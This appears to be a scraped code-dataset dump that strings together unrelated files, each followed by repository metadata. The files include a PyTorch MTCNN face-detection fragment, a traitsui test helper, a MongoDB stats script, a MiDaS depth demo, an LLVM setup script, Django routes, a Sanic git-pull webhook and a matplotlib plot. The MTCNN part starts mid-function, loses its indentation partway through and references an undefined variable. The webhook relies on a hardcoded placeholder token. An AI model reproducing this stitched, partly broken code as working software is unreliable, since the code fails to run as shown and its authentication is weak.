        bounding_boxes = bounding_boxes[keep]
        # Square the boxes again.
        bounding_boxes = self.convert_to_square(bounding_boxes)
        bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4]).copy()
        print('totl bboxes after nms:', len(bounding_boxes))
        # (A commented-out matplotlib visualization of this stage's boxes
        # used to live here.)
        if is_gpu_available():
            torch.cuda.synchronize()
            torch.cuda.empty_cache()
            gc.collect()
        # Stage 3: output stage with O-Net.
        img_boxes = self.get_image_boxes(bounding_boxes, size=48)
        if len(img_boxes) == 0:
            return [], []
        print('ONet!')
        probs = []
        offsets = []
        landmarks = []
        if len(img_boxes) > 16:
            for i in range(len(img_boxes) //16 + 1):
                if i * 16 < len(img_boxes):
                    output = self.onet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
                    probs.append(output['confidence'].copy())
                    offsets.append(output['box'].copy())
                    landmarks.append(output['landmark'].copy())
                    del output
            probs = concate(probs, axis=0)
            offsets = concate(offsets, axis=0)
            landmarks = concate(landmarks, axis=0)
        else:
            output = self.onet(to_tensor(img_boxes))
            probs = output['confidence']  # shape [n_boxes, 1]
            offsets = output['box']  # shape [n_boxes, 4]
            # Only this stage's facial landmarks are used downstream.
            landmarks = output['landmark']  # shape [n_boxes, 10]
        # Drop candidates below this stage's probability threshold.
        keep = where(probs[:, 0] > self.detection_threshold[2])[0]
        bounding_boxes = bounding_boxes[keep]
        bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
        offsets = offsets[keep]
        landmarks = landmarks[keep]
        print('totl bboxes:', len(bounding_boxes))
        # Refine the coordinates, then compute absolute landmark positions.
        bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
        # Landmarks come out relative to the box; map them to image pixels.
        width = bounding_boxes[:, 2] - bounding_boxes[:, 0] + 1.0
        height = bounding_boxes[:, 3] - bounding_boxes[:, 1] + 1.0
        xmin, ymin = bounding_boxes[:, 0], bounding_boxes[:, 1]
        landmarks[:, 0:5] = expand_dims(xmin, 1) + expand_dims(width, 1) * landmarks[:, 0:5]
        landmarks[:, 5:10] = expand_dims(ymin, 1) + expand_dims(height, 1) * landmarks[:, 5:10]
        # One final NMS pass.
        keep = self.nms(bounding_boxes, self.nms_threshold[2])
        print('totl bboxes after nms:', len(bounding_boxes))
        bounding_boxes = bounding_boxes[keep]
        landmarks = landmarks[keep]
        probs = probs[keep]
        # (A commented-out matplotlib visualization of the final boxes and
        # landmarks used to live here.)
        gc.collect()
        return self.image.copy(), bounding_boxes, probs, landmarks
# 執行第一階段
    def run_first_stage(self, img, scale):
        """Run P-Net, generate bounding boxes, and do NMS.
        Arguments:
            img: one level of the image pyramid (an array with .shape --
                the original docstring said PIL.Image; see note below).
            scale: a float number,
                scale width and height of the image by this number.
        Returns:
            a float numpy array of shape [n_boxes, 9],
            bounding boxes with scores and offsets (4 + 1 + 4).

        NOTE(review): `sh`, `sw`, `width` and `height` are computed but
        never used; `img.shape` implies an array input, not PIL.Image.
        """
        sh, sw = img.shape[:2]
        width, height = self.width, self.height
        threshold = self.detection_threshold[0]
        # Preprocess the image, then feed it to P-Net.
        for transform in self.preprocess_flow:
            img = transform(img)
        output = self.pnet(expand_dims(to_tensor(img), 0))
        probs = output['confidence'][0, 0, :, :]
        offsets = output['box']
        # Turn the fully-convolutional output into candidate box coordinates.
        boxes = self.generate_bboxes(probs, offsets, scale, threshold)
        # NMS at this scale keeps the candidate count small enough that the
        # later R-Net/O-Net stages do not run out of GPU memory.
        keep = self.nms(boxes[:, 0:5], overlap_threshold=self.nms_threshold[0])
        boxes = boxes[keep].copy()
        del output
        return boxes
# 根據候選框座標至原圖挖取人臉圖像,已進行後續階段
def get_image_boxes(self, bounding_boxes, size=24):
"""Cut out boxes from the image.
Arguments:
bounding_boxes: a float numpy array of shape [n, 5].
size: an integer, size of cutouts.
Returns:
a float numpy array of shape [n, 3, size, size].
"""
num_boxes = len(bounding_boxes)
height, width = self.image.shape[:2]
# 宣告空白的img_boxes物件用來存放挖取的人臉圖像區域
img_boxes = np.zeros((num_boxes, 3, size, size), "float32")
n = 0
for i in range(num_boxes):
x1, y1, x2, y2 = bounding_boxes[i][:4]
try:
# 根據x1,y1,x2,y2座標,且座標必須大於零且小於等於圖像長寬的原則來挖取人臉區域
yy1 = int(builtins.max(y1, 0))
yy2 = int(builtins.min(y2, self.height))
xx1 = int(builtins.max(x1, 0))
xx2 = int(builtins.min(x2, self.width))
img_box = self.image[yy1:yy2, xx1:xx2, :]
if img_box.shape[0] != img_box.shape[1]:
# 若挖出非正方形則補滿為正方形
max_length = builtins.max(list(img_box.shape[:2]))
new_img_box = np.zeros((max_length, max_length, 3))
new_img_box[0:img_box.shape[0], 0:img_box.shape[1], :] = img_box
img_box = new_img_box
# 將正方形區域縮放後,經過預處理self.preprocess_flow後再塞入img_boxes
img_box = resize((size, size), keep_aspect=True)(img_box)
for transform in self.preprocess_flow:
img_box = transform(img_box)
img_boxes[i, :, :, :] = img_box
n += 1
except:
pass
# 列印一下成功挖取的區域數量(有可能座標本身不合理造成無法成功挖取)
print(n, 'image generated')
return img_boxes
    def infer_single_image(self, img, **kwargs):
        """Detect faces on one image and return numpy results.

        Returns (rgb_image, boxes, probs, landmarks).

        NOTE(review): `probs` is cast to int32, which truncates every
        confidence in (0, 1) to 0 — presumably unintended; confirm before
        relying on the returned probabilities.
        """
        if self.model.built:
            self.model.to(self.device)
            self.model.eval()
        image, boxes, probs, landmarks = self.detect(img)
        return image, to_numpy(boxes), to_numpy(probs).astype(np.int32), to_numpy(landmarks)
def infer_then_draw_single_image(self, img):
start_time = time.time()
rgb_image, boxes, probs, landmark = self.infer_single_image(img)
if boxes is not None and len(boxes) > 0:
boxes = np.round(boxes).astype(np.int32)
if boxes.ndim == 1:
boxes = np.expand_dims(boxes, 0)
print(img, time.time() - start_time)
pillow_img = array2image(rgb_image.copy())
print(boxes, labels, flush=True)
if len(boxes) > 0:
for m in range(len(boxes)):
this_box = boxes[m]
this_label = 1
if int(this_label) > 0:
thiscolor = self.palette[1]
print('face', this_box, probs[m], flush=True)
pillow_img = plot_bbox(this_box, pillow_img, thiscolor, self.class_names[
int(this_label)] if self.class_names is not None else '', line_thickness=2)
rgb_image = np.array(pillow_img.copy())
return rgb_image, boxes, probs, landmark
| AllanYiin/trident | trident/models/pytorch_mtcnn.py | pytorch_mtcnn.py | py | 28,973 | python | en | code | 74 | github-code | 6 | [
{
"api_name": "trident.backend.pytorch_backend.get_device",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "... |
30358044871 | import wx
from traitsui.wx.check_list_editor import CustomEditor
from traitsui.testing.tester.command import MouseClick
from traitsui.testing.tester.locator import Index
from traitsui.testing.tester._ui_tester_registry._common_ui_targets import (
BaseSourceWithLocation,
)
from traitsui.testing.tester._ui_tester_registry._layout import (
column_major_to_row_major,
)
from traitsui.testing.tester._ui_tester_registry.wx import _interaction_helpers
class _IndexedCustomCheckListEditor(BaseSourceWithLocation):
    """Wrapper for CheckListEditor + Index"""
    # UI-tester target: a custom (panel-based) CheckListEditor addressed by
    # item index.
    source_class = CustomEditor
    locator_class = Index
    # A MouseClick at index *i* clicks the i-th checkbox child of the
    # editor's panel; the index is first converted from the column-major
    # display order to the sizer's row-major order (see convert_index).
    handlers = [
        (
            MouseClick,
            (
                lambda wrapper, _: _interaction_helpers.mouse_click_checkbox_child_in_panel(
                    control=wrapper._target.source.control,
                    index=convert_index(
                        source=wrapper._target.source,
                        index=wrapper._target.location.index,
                    ),
                    delay=wrapper.delay,
                )
            ),
        ),
    ]
def convert_index(source, index):
    """Map a column-major display index to the sizer's row-major index.

    The wx.GridSizer underlying a custom CheckListEditor is populated in
    row-major order, but its entries are assigned so that they read in
    column-major order when displayed.  Given the *index* of an item as
    displayed, return the index of the corresponding child inside the
    sizer.  A wx.BoxSizer needs no conversion.

    Parameters
    ----------
    source : CustomEditor
        The Custom CheckList Editor of interest; its control is the
        wx.Panel whose children are organized by the sizer.
    index : int
        The display (column-major) index of interest.
    """
    sizer = source.control.GetSizer()
    if isinstance(sizer, wx.BoxSizer):
        return index
    item_count = len(source.names)
    col_count = sizer.GetCols()
    row_count = sizer.GetEffectiveRowsCount()
    return column_major_to_row_major(index, item_count, row_count, col_count)
def register(registry):
    """Register interactions for the given registry.
    If there are any conflicts, an error will occur.
    Parameters
    ----------
    registry : TargetRegistry
        The registry being registered to.
    """
    # Registers the (CustomEditor, Index, MouseClick) handlers declared on
    # the wrapper class above.
    _IndexedCustomCheckListEditor.register(registry)
| enthought/traitsui | traitsui/testing/tester/_ui_tester_registry/wx/_traitsui/check_list_editor.py | check_list_editor.py | py | 2,444 | python | en | code | 290 | github-code | 6 | [
{
"api_name": "traitsui.testing.tester._ui_tester_registry._common_ui_targets.BaseSourceWithLocation",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "traitsui.wx.check_list_editor.CustomEditor",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "traitsui.testing... |
23934349151 | from pymongo import MongoClient
import pprint
import statistics
# MongoDB client for the local "fantasypros" database used by all helpers
# below.
client = MongoClient('mongodb://localhost:27017/')
db = client.fantasypros
def find():
    """Compute and store summary statistics for every distinct player name
    found in the weekly stats collection."""
    for name in db.playersbywk.distinct("name"):
        getstats(name)
def getstats(player):
    """Collect the weekly fantasy point totals (and position) for *player*
    from db.playersbywk and hand them to savestats."""
    weekly_points = []
    position = ''
    cursor = db.playersbywk.find(
        {'name': player},
        {"_id": 0, "total_points": 1, "position": 1},
    )
    for doc in cursor:
        weekly_points.append(doc['total_points'])
        position = doc['position']
    savestats(player, weekly_points, position)
def savestats(player, points, player_position):
    """Compute mean / standard deviation / coefficient of variation for a
    player's weekly point totals, print them, and insert the record into
    db.players.

    Args:
        player: player name.
        points: list of per-week point totals (callers supply at least one
            game; statistics.mean raises StatisticsError on an empty list).
        player_position: the player's position string.
    """
    # Hoisted: the original recomputed statistics.mean/stdev up to four
    # times each.
    mean_val = statistics.mean(points)
    player_dict = {
        'name': player,
        'position': player_position,
        'mean': str(mean_val),
    }
    print("Player: " + player)
    print("Position: " + player_position)
    print("Mean is: " + str(mean_val))
    if len(points) >= 2:
        stdev_val = statistics.stdev(points)
        player_dict['stdev'] = str(stdev_val)
        print("Standard Deviation is: " + str(stdev_val))
        if mean_val != 0:
            coeff_var = stdev_val / mean_val
            player_dict['coeff_var'] = str(coeff_var)
            print("Coefficient of Variance is: " + str(coeff_var))
    print("Number of games: " + str(len(points)))
    player_dict['num_of_games'] = str(len(points))
    # NOTE: Collection.insert is removed in modern pymongo (insert_one is
    # the replacement); kept here for compatibility with the installed
    # driver version.
    db.players.insert(player_dict)
# Script entry point: walk every player and persist their summary stats.
if __name__ == '__main__':
    find()
| soboy2/pyrandom | fbstats.py | fbstats.py | py | 1,583 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "statistics.mean",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "statistics.mean",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "statistics.stdev",... |
12769514952 | import cv2
from cv2 import waitKey
import torch
import urllib.request
import os
import matplotlib.pyplot as plt
print(torch.__version__)
# Work around "duplicate OpenMP runtime" aborts seen with some
# conda/PyTorch installs; lets the process continue with multiple libiomp
# copies loaded.
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"
# url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
# urllib.request.urlretrieve(url, filename)
# Choose which MiDaS variant to pull from torch.hub.
model_type = "DPT_Large" # MiDaS v3 - Large (highest accuracy, slowest inference speed)
#model_type = "DPT_Hybrid" # MiDaS v3 - Hybrid (medium accuracy, medium inference speed)
#model_type = "MiDaS_small" # MiDaS v2.1 - Small (lowest accuracy, highest inference speed)
midas = torch.hub.load("intel-isl/MiDaS", model_type)
# change to gpu when available
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
midas.to(device)
midas.eval()
# Load transforms to resize and normalize the image for large or small model
midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms")
if model_type == "DPT_Large" or model_type == "DPT_Hybrid":
    transform = midas_transforms.dpt_transform
else:
    transform = midas_transforms.small_transform
# Load image and apply transforms
filename = '1646652789610919952.jpg'
img = cv2.imread(filename)
# OpenCV loads BGR; convert to the RGB layout the MiDaS transforms expect.
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
input_batch = transform(img).to(device)
# Predict and resize to original resolution
with torch.no_grad():
    prediction = midas(input_batch)
    # Upsample the low-resolution depth prediction back to the input size.
    prediction = torch.nn.functional.interpolate(
        prediction.unsqueeze(1),
        size=img.shape[:2],
        mode="bicubic",
        align_corners=False
    ).squeeze()
output = prediction.cpu().numpy()
# Display the predicted depth map.
plt.imshow(output)
plt.show()
{
"api_name": "torch.__version__",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.hub.load",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "torch.hub",
"... |
2856076738 | import re, unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
class CMakeGeneratorTest(unittest.TestCase):
    """Checks on the CMake generator's auxiliary test-setup output."""

    def extractMacro(self, name, text):
        """Return the ``macro(<name>) ... endmacro()`` span found in *text*."""
        # Fixed: raw string literals.  The originals relied on Python
        # passing unknown escapes like "\(" through unchanged, which emits
        # DeprecationWarning ("invalid escape sequence") on modern
        # interpreters; the resulting pattern is byte-identical.
        pattern = r".*(macro\(%s\).*?endmacro\(\)).*" % name
        return re.sub(pattern, r"\1", text, flags=re.DOTALL)

    def aux_cmake_test_setup_test(self):
        # NOTE(review): this name does not match unittest's `test*` pattern,
        # so the runner never executes it; renaming it to
        # `test_aux_cmake_setup` would activate it.  Left unchanged to avoid
        # altering the suite's observed behavior.
        conanfile = ConanFile(None, None, Settings({}), None)
        generator = CMakeGenerator(conanfile)
        aux_cmake_test_setup = generator._aux_cmake_test_setup()
        # extract the conan_basic_setup macro
        macro = self.extractMacro("conan_basic_setup", aux_cmake_test_setup)
        self.assertEqual("""macro(conan_basic_setup)
    conan_check_compiler()
    conan_output_dirs_setup()
    conan_flags_setup()
    conan_set_find_paths()
endmacro()""", macro)
        # extract the conan_set_find_paths macro
        macro = self.extractMacro("conan_set_find_paths", aux_cmake_test_setup)
        self.assertEqual("""macro(conan_set_find_paths)
    # CMake can find findXXX.cmake files in the root of packages
    set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
    # Make find_package() to work
    set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
| AversivePlusPlus/AversivePlusPlus | tools/conan/conans/test/generators/cmake_test.py | cmake_test.py | py | 1,364 | python | en | code | 31 | github-code | 6 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "re.sub",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.DOTALL",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "conans.model.conan_file.C... |
39184026326 | # ----------------------------------------------------------------------
# |
# | Setup_custom.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2022-10-14 12:37:50
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2022
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
# pylint: disable=missing-module-docstring
import copy
import os
import uuid
import sys
import textwrap
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
from semantic_version import Version as SemVer # pylint: disable=unused-import
from Common_Foundation.ContextlibEx import ExitStack # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import PathEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Shell.All import CurrentShell # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Shell import Commands # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Streams.DoneManager import DoneManager # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import SubprocessEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import TextwrapEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import Types # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap import Configuration # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap import Constants # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadNSISInstaller import DownloadNSISInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadSevenZipInstaller import DownloadSevenZipInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadZipInstaller import DownloadZipInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.Installer import Installer # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.LocalSevenZipInstaller import LocalSevenZipInstaller # type: ignore # pylint: disable=import-error,unused-import
# ----------------------------------------------------------------------
from _install_data import GRCOV_VERSIONS, LLVM_VERSIONS
del sys.modules["_install_data"]
# ----------------------------------------------------------------------
def GetConfigurations() -> Union[
Configuration.Configuration,
Dict[
str, # configuration name
Configuration.Configuration,
],
]:
configurations: Dict[str, Configuration.Configuration] = {}
if CurrentShell.family_name == "Windows":
target_architectures = ["x64", ] # TODO: "x86"
else:
target_architectures = [CurrentShell.current_architecture, ]
common_foundation_dependency = Configuration.Dependency(
uuid.UUID("DD6FCD30-B043-4058-B0D5-A6C8BC0374F4"),
"Common_Foundation",
"python310",
"https://github.com/davidbrownell/v4-Common_Foundation.git",
)
for llvm_version in LLVM_VERSIONS.keys():
version_specs = Configuration.VersionSpecs(
[Configuration.VersionInfo("LLVM", SemVer(llvm_version)), ],
{},
)
if CurrentShell.family_name == "Windows":
for target_architecture in target_architectures:
configurations["{}-mingw-{}".format(llvm_version, target_architecture)] = Configuration.Configuration(
"""Uses LLVM 'v{}' (using mingw (aka "Msys2 MinGW Clang" at https://blog.conan.io/2022/10/13/Different-flavors-Clang-compiler-Windows.html)) targeting '{}'.""".format(llvm_version, target_architecture),
[common_foundation_dependency, ],
version_specs,
)
for msvc_version in [
"17.4",
]:
for target_architecture in target_architectures:
configurations["{}-msvc-{}-{}".format(llvm_version, msvc_version, target_architecture)] = Configuration.Configuration(
"""Uses LLVM 'v{}' (using Microsoft Visual Studio 'v{}' (aka "LLVM/Clang" at https://blog.conan.io/2022/10/13/Different-flavors-Clang-compiler-Windows.html)) targeting '{}'.""".format(
llvm_version,
msvc_version,
target_architecture,
),
[
Configuration.Dependency(
uuid.UUID("6e6cbb2c-6512-470f-ba88-a6e4ad85fed0"),
"Common_cpp_MSVC",
"{}-{}".format(msvc_version, target_architecture),
"https://github.com/davidbrownell/v4-Common_cpp_MSVC.git",
),
],
version_specs,
)
else:
for target_architecture in target_architectures:
configurations["{}-{}".format(llvm_version, target_architecture)] = Configuration.Configuration(
"Uses LLVM 'v{}' (without any external dependencies) targeting '{}'.".format(
llvm_version,
target_architecture,
),
[common_foundation_dependency, ],
version_specs,
)
return configurations
# ----------------------------------------------------------------------
def GetCustomActions(
# Note that it is safe to remove any parameters that are not used
dm: DoneManager,
explicit_configurations: Optional[List[str]],
force: bool,
interactive: Optional[bool],
) -> List[Commands.Command]:
commands: List[Commands.Command] = []
root_dir = Path(__file__).parent
assert root_dir.is_dir(), root_dir
# Create a link to the foundation's .pylintrc file
foundation_root_file = Path(Types.EnsureValid(os.getenv(Constants.DE_FOUNDATION_ROOT_NAME))) / ".pylintrc"
assert foundation_root_file.is_file(), foundation_root_file
commands.append(
Commands.SymbolicLink(
root_dir / foundation_root_file.name,
foundation_root_file,
remove_existing=True,
relative_path=True,
),
)
with dm.Nested("\nProcessing 'Common_LLVM' tools...") as extract_dm:
with extract_dm.Nested("Processing 'grcov'...") as grcov_dm:
for index, (grcov_version, install_data) in enumerate(GRCOV_VERSIONS.items()):
with grcov_dm.Nested("'{}' ({} of {})...".format(grcov_version, index + 1, len(GRCOV_VERSIONS))) as version_dm:
install_data.installer.Install(
version_dm,
force=force,
prompt_for_interactive=install_data.prompt_for_interactive,
interactive=interactive,
)
with extract_dm.Nested("Processing 'LLVM'...") as llvm_dm:
for index, (version, install_data_items) in enumerate(LLVM_VERSIONS.items()):
with llvm_dm.Nested(
"'{}' ({} of {})...".format(
version,
index + 1,
len(LLVM_VERSIONS),
),
) as version_dm:
if explicit_configurations and not any(explicit_configuration.startswith(version) for explicit_configuration in explicit_configurations):
version_dm.WriteVerbose("The version was skipped.\n")
continue
for install_data_item in install_data_items:
with version_dm.Nested("'{}'...".format(install_data_item.name)) as this_dm:
install_data_item.installer.Install(
this_dm,
force=force,
prompt_for_interactive=install_data_item.prompt_for_interactive,
interactive=interactive,
)
if CurrentShell.family_name != "Windows":
# Create a simple test program to ensure that LLVM was installed correctly
with version_dm.Nested("Validating installation...") as validate_dm:
temp_directory = CurrentShell.CreateTempDirectory()
was_successful = False
# ----------------------------------------------------------------------
def OnExit():
if was_successful:
PathEx.RemoveTree(temp_directory)
return
validate_dm.WriteInfo("The temporary directory '{}' has not been deleted.".format(temp_directory))
# ----------------------------------------------------------------------
with ExitStack(OnExit):
source_filename = temp_directory / "test.cpp"
with validate_dm.Nested("Creating source file..."):
with source_filename.open("w") as f:
f.write(
textwrap.dedent(
"""\
#include <iostream>
int main() {
std::cout << "Hello world!\\n";
return 0;
}
""",
),
)
with validate_dm.Nested("Compiling...") as compile_dm:
command_line = 'clang++ "{}"'.format(source_filename.name)
compile_dm.WriteVerbose("Command Line: {}\n\n".format(command_line))
modified_env = copy.deepcopy(os.environ)
modified_env["PATH"] = "{}:{}".format(
modified_env["PATH"],
install_data_item.installer.output_dir / "bin",
)
modified_env["LD_LIBRARY_PATH"] = "{}".format(
install_data_item.installer.output_dir / "lib" / "x86_64-unknown-linux-gnu",
)
result = SubprocessEx.Run(
command_line,
cwd=temp_directory,
env=modified_env, # type: ignore
)
compile_dm.result = result.returncode
if compile_dm.result != 0:
compile_dm.WriteError(
textwrap.dedent(
"""\
Errors here generally indicate that glibc has not been installed (especially if the error is associated with 'features.h').
Visit https://www.gnu.org/software/libc/ for more information.
Please install glibc using your distro's favorite package manager.
Examples:
Ubuntu: `apt-get install -y libc6-dev`
COMPILER ERROR
--------------
{}
""",
).format(
TextwrapEx.Indent(result.output.strip(), 4),
),
)
return []
with compile_dm.YieldVerboseStream() as stream:
stream.write(result.output)
with validate_dm.Nested("Testing...") as testing_dm:
command_line = "./a.out"
testing_dm.WriteVerbose("Command Line: {}\n\n".format(command_line))
result = SubprocessEx.Run(
command_line,
cwd=temp_directory,
)
testing_dm.result = result.returncode
if testing_dm.result == 0:
testing_dm.result = 0 if result.output == "Hello world!\n" else -1
if testing_dm.result != 0:
compile_dm.WriteError(result.output)
return []
with testing_dm.YieldVerboseStream() as stream:
stream.write(result.output)
was_successful = True
return commands
| davidbrownell/v4-Common_LLVM | Setup_custom.py | Setup_custom.py | py | 15,433 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.modules",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "RepositoryBootstrap.Configuration.Configuration",
"line_number": 60,
"usage_type": "attribute"
},
{
... |
42117272334 | from django.conf.urls import url
from django.contrib import admin
from users import views as usersViews
from bookmark import views as bookmarkViews
urlpatterns = [
url(r'^login', usersViews.login),
url(r'^logout', usersViews.logout),
url(r'^register', usersViews.register),
url(r'^bookmark/$', bookmarkViews.index),
url(r'^bookmark/form/(?P<id>[0-9]+)/$', bookmarkViews.edit),
url(r'^bookmark/form/$', bookmarkViews.new),
url(r'^bookmark/delete/(?P<id>[0-9]+)/$', bookmarkViews.delete),
url(r'^users/', usersViews.list),
url(r'^$', usersViews.home),
]
| jlneto15/bookmark | web/app/urls.py | urls.py | py | 589 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.conf.urls.url",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "users.views.login",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "users.views",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.conf.urls... |
4558179615 | import subprocess
from sanic import Sanic, response
# import os
app = Sanic(__name__)
app.ctx.restarting = False
@app.route("/")
async def test(_):
return response.html(open("index.html", encoding='utf-8').read())
def is_github_request(request):
# check if the request is from github, with the api key, the curl command is at the bottom of the file
return request.headers.get("Authorization") == "Bearer " + "ABC123"
@app.route("/restart", methods=["POST"])
def webhook(request):
# github actions posts to this endpoint, its @ the bottom of the file
# check if the request is from github, with the api key, the curl command is at the bottom of the file
if not is_github_request(request):
return response.text("Not Authorized", status=401)
subprocess.call(["git", "pull"])
return response.text("Restarting")
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000, auto_reload=True)
# whats command to create requirements.txt
| sooswastaken/continuous-integration | server.py | server.py | py | 994 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sanic.Sanic",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sanic.response.html",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sanic.response",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sanic.response.text",
... |
20869059181 | import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.cm as cm
import matplotlib
import random
vida=[]
defesa=[]
ataque=[]
#Spearador de Dados
def separador_atributos(arquivo):
vida_max=0
vida_min=18
def_max=0
def_min=18
atk_max=0
atk_min=18
numero_pontos=0
linha=arquivo.readline()
while linha:
atributos=linha.split()
#transfere para txt
vida.append(int(atributos[0]))
if(int(atributos[0])>vida_max):
vida_max=int(atributos[0])
if(int(atributos[0])<vida_min):
vida_min=int(atributos[0])
defesa.append(int(atributos[1]))
if(int(atributos[1])>def_max):
def_max=int(atributos[1])
if(int(atributos[1])<def_min):
def_min=int(atributos[1])
ataque.append(int(atributos[2]))
if(int(atributos[2])>atk_max):
atk_max=int(atributos[2])
if(int(atributos[2])<atk_min):
atk_min=int(atributos[2])
numero_pontos+=1
linha=arquivo.readline()
arquivo.close()
return(vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos)
def frequencia_absoluta(atributo ,atributo_max, atributo_min, numero_pontos):
num_atributo=[0]*18
maior_F=0
for i in range((atributo_max-atributo_min)+1): #verifica todos valores de atributo
for j in range(numero_pontos): #varre todo os pontos
if(atributo[j]==(i+1)): #se a atributo bater com a que esta sendo avaliada
num_atributo[i]+=((1/numero_pontos)) #armazena vetor def atk para atributo=[i]
if(num_atributo[i]>maior_F):
maior_F=num_atributo[i]
return(num_atributo)
def ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos):
c=[]
for i in range(numero_pontos):
c.append((frequencia_vida[(vida[i]-1)])*(frequencia_def[(defesa[i]-1)])*(frequencia_atk[(ataque[i]-1)]))
return(c)
def modelo_calculado():
modelo=open("../modelo.txt", "r")
linha=modelo.readline()
coeficientes=linha.split()
atk_amostras=[0]*1000
def_amostras=[0]*1000
vida_amostras=[0]*1000
for i in range(1000):
if (int(coeficientes[5])>=1):
def_amostras[i]=np.random.randint(int(coeficientes[5], int(coeficientes[6])))
else:
def_amostras[i]=np.random.randint((int(coeficientes[5])+1), int(coeficientes[6])+2)-1
vida_amostras[i]=np.random.randint(int(coeficientes[3]), int(coeficientes[4])+1)
#calcula atk
atk_amostras[i]=((vida_amostras[i]-float(coeficientes[0])-(float(coeficientes[1])*def_amostras[i]))/float(coeficientes[2]))
return(def_amostras, atk_amostras, vida_amostras)
#recolhe dados
arquivo=open("../dados/vencedor.txt", "r")
vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos=separador_atributos(arquivo)
frequencia_vida=frequencia_absoluta(vida ,vida_max, vida_min, numero_pontos)
frequencia_def=frequencia_absoluta(defesa ,def_max, def_min, numero_pontos)
frequencia_atk=frequencia_absoluta(ataque ,atk_max, atk_min, numero_pontos)
c=ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos)
def_amostras, atk_amostras, vida_amostras=modelo_calculado()
#plotando
fig=plt.figure()
ax=fig.add_subplot(111, projection='3d')
ax.text2D(0.05, 0.95, "Dispersao & Concentração Atributos(Vencedores)", transform=ax.transAxes)
ax.scatter(defesa, ataque, vida, cmap="cool", c=c)
ax.plot_trisurf(def_amostras, atk_amostras, vida_amostras, color="red")
ax.set_xlabel("Defesa",fontsize=13)
ax.set_ylabel("Ataque",fontsize=13)
ax.set_zlabel("Vida",fontsize=13)
#ax.legend(loc=3, bbox_to_anchor=(-0.5, -0.1))
#saida
ax.view_init(elev=30, azim=45)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores1.png", format='png')
ax.view_init(elev=30, azim=-20)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores2.png", format='png')
ax.view_init(elev=15, azim=-50)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores3.png", format='png')
| Edumarek123/Machine_Learning | graficos/graficos_dispersao.py | graficos_dispersao.py | py | 4,235 | python | pt | code | 0 | github-code | 6 | [
